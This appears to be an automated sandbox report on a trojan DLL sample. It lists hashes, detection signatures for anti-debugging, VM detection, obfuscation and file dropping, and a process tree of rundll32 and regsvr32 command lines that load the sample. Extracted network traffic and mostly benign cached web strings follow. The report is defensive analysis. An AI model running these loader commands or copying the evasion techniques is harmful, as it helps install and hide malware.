Loading ...

Play interactive tourEdit tour

Windows Analysis Report mATFWhYtPk

Overview

General Information

Sample Name:mATFWhYtPk (renamed file extension from none to dll)
Analysis ID:533067
MD5:70798426016c93e3d52363c8a902333f
SHA1:02f29a5c7e7f8230b86d26b36757c1aaa968dde7
SHA256:5e3bcb83c60c7d06d42822afe1d36c3b0f866ef678935c5903cda936009713a1
Tags:32dllexetrojan
Infos:

Most interesting Screenshot:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Tries to detect virtualization through RDTSC time measurements
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Registers a DLL
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3272 cmdline: loaddll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 352 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1936 cmdline: rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 4596 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 3912 cmdline: regsvr32.exe /s C:\Users\user\Desktop\mATFWhYtPk.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • rundll32.exe (PID: 3516 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • iexplore.exe (PID: 5868 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 6044 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5868 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 2976 cmdline: rundll32.exe C:\Users\user\Desktop\mATFWhYtPk.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5796 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uexmfpkplvbbrf\jerrpf.tlt",SfMITlqpKAP MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4536 cmdline: rundll32.exe C:\Users\user\Desktop\mATFWhYtPk.dll,asbiqstaeqzsycc MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 2784 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6548 cmdline: rundll32.exe C:\Users\user\Desktop\mATFWhYtPk.dll,atwuhkycfybkj MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5812 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5952 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 6340 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: mATFWhYtPk.dllVirustotal: Detection: 25%Perma Link
Source: mATFWhYtPk.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
Source: unknownHTTPS traffic detected: 23.211.6.95:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.211.6.95:443 -> 192.168.2.6:49787 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.211.6.95:443 -> 192.168.2.6:49792 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.211.6.95:443 -> 192.168.2.6:49791 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.211.6.95:443 -> 192.168.2.6:49804 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.211.6.95:443 -> 192.168.2.6:49803 version: TLS 1.2
Source: mATFWhYtPk.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F22B531 FindFirstFileExA,2_2_6F22B531
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F22B531 FindFirstFileExA,3_2_6F22B531
Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox ViewIP Address: 23.211.6.95 23.211.6.95
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: de-ch[1].htm.6.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: de-ch[1].htm.6.drString found in binary or memory: <a href="https://www.linkedin.com:443/news/story/gibt-es-einen-impfstoffmangel-5630362/?li=BBqfZdV" > equals www.linkedin.com (Linkedin)
Source: msapplication.xml0.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xf48ae3b0,0x01d7e821</date><accdate>0xf4a9e53b,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xf78f5b13,0x01d7e821</date><accdate>0xfb03e25c,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xfb502d4d,0x01d7e821</date><accdate>0xfb6f2be4,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.6.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//browser.events.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//browser.events.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.6.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
Source: svchost.exe, 0000000C.00000002.911297448.0000020000062000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000000C.00000002.911297448.0000020000062000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns/fb#
Source: {F0A62C50-5414-11EC-90E5-ECF4BB2D2496}.dat.4.dr, ~DFF3249FCAE5CBA117.TMP.4.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: imagestore.dat.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: msapplication.xml.4.drString found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.4.drString found in binary or memory: http://www.google.com/
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.4.drString found in binary or memory: http://www.live.com/
Source: msapplication.xml3.4.drString found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.4.drString found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.4.drString found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.4.drString found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.4.drString found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.6.drString found in binary or memory: https://amzn.to/2TTxhNg
Source: de-ch[1].htm.6.drString found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.drString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/oneTrust/1.2/consent/55a804ab-e5c6-4b97-9319-86263d36
Source: de-ch[1].htm.6.drString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0/t.js?qsp=true&anoncknm=%22%22&name=%22MS.News.W
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_na
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=273363&amp;a=3064090&amp;g=24940322
Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692
Source: ~DFF3249FCAE5CBA117.TMP.4.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
Source: {F0A62C50-5414-11EC-90E5-ECF4BB2D2496}.dat.4.dr, ~DFF3249FCAE5CBA117.TMP.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: {F0A62C50-5414-11EC-90E5-ECF4BB2D2496}.dat.4.dr, ~DFF3249FCAE5CBA117.TMP.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: iab2Data[1].json.6.drString found in binary or memory: https://doceree.com/.well-known/deviceStorage.json
Source: iab2Data[1].json.6.drString found in binary or memory: https://doceree.com/us-privacy-policy/
Source: iab2Data[1].json.6.drString found in binary or memory: https://evorra.com/product-privacy-policy/
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1638488541&amp;rver=7.0.6730.0&am
Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/logout.srf?ct=1638488542&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1638488541&amp;rver=7.0.6730.0&amp;w
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://msasg.visualstudio.com/Shared%20Data/_git/1DS.JavaScript?version=GBnubenja%2Fcustom-package
Source: iab2Data[1].json.6.drString found in binary or memory: https://nextmillennium.io/privacy-policy/
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.6.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;Fotos
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: iab2Data[1].json.6.drString found in binary or memory: https://optimise-it.de/datenschutz
Source: de-ch[1].htm.6.drString found in binary or memory: https://outlook.com/
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/calendar
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
Source: {F0A62C50-5414-11EC-90E5-ECF4BB2D2496}.dat.4.dr, ~DFF3249FCAE5CBA117.TMP.4.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.6.drString found in binary or memory: https://secure.adnxs.com/clktrb?id=764680&amp;t=1
Source: iab2Data[1].json.6.drString found in binary or memory: https://silvermob.com/privacy
Source: iab2Data[1].json.6.drString found in binary or memory: https://smartyads.com/privacy-policy
Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
Source: imagestore.dat.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AARlHk9.img?h=368&amp;
Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&amp;
Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&amp;
Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&amp;
Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.6.drString found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;
Source: de-ch[1].htm.6.drString found in binary or memory: https://twitter.com/
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://twitter.com/i/notifications;Ich
Source: iab2Data[1].json.6.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: iab2Data[1].json.6.drString found in binary or memory: https://www.botman.ninja/privacy-policy
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;t
Source: imagestore.dat.6.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.linkedin.com:443/news/story/gibt-es-einen-impfstoffmangel-5630362/?li=BBqfZdV
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/
Source: ~DFF3249FCAE5CBA117.TMP.4.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/ab-2025-gibt-es-einarmige-banditen-und-roulette-in-der-lokstadt
